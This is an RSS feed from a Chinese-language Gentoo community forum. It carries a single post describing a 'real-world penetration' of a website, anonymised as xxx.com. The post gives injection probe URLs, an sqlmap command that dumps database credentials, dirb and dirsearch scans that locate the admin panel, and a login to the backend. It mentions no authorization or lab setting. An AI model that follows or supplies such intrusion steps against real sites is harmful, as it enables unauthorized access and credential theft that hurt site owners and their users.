<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="http://gentoo-zh.org/extern.php?action=feed&amp;tid=720&amp;type=rss" rel="self" type="application/rss+xml" />
		<title><![CDATA[Gentoo中文社区 / 实战渗透]]></title>
		<link>http://www.gentoo-zh.org/viewtopic.php?id=720</link>
		<description><![CDATA[实战渗透 最近发表的帖子。]]></description>
		<lastBuildDate>Sat, 14 Oct 2023 13:35:20 +0000</lastBuildDate>
		<generator>FluxBB</generator>
		<item>
			<title><![CDATA[实战渗透]]></title>
			<link>http://www.gentoo-zh.org/viewtopic.php?pid=832#p832</link>
			<description><![CDATA[<p>通过信息收集找到一个网站xxx.com，发现有一个地方有传入参数，测试一下是否有注入。<br /><a href="http://www.xxx.com/se?cid=3" rel="nofollow">www.xxx.com/se?cid=3&#039;</a>&#160; &#160;显示页面不正常<br /><a href="http://www.xxx.com/se?cid=3--+" rel="nofollow">www.xxx.com/se?cid=3&#039;--+</a>&#160; 显示页面正常&#160; &#160;存在布尔注入。</p><p>使用sqlmap工具注入。<br />sqlmap -u &quot;url&quot; -D 数据库名 -T 表名 -C 列名 --dump </p><p>得到账号密码后，进行目录扫描。<br />dirb url<br />dirsearch -u url<br />得到网站后台路径<br /><a href="https://www.xxx.com/system/main.php" rel="nofollow">https://www.xxx.com/system/main.php</a><br />成功登录后台。</p>]]></description>
			<author><![CDATA[dummy@example.com (snow)]]></author>
			<pubDate>Sat, 14 Oct 2023 13:35:20 +0000</pubDate>
			<guid>http://www.gentoo-zh.org/viewtopic.php?pid=832#p832</guid>
		</item>
	</channel>
</rss>
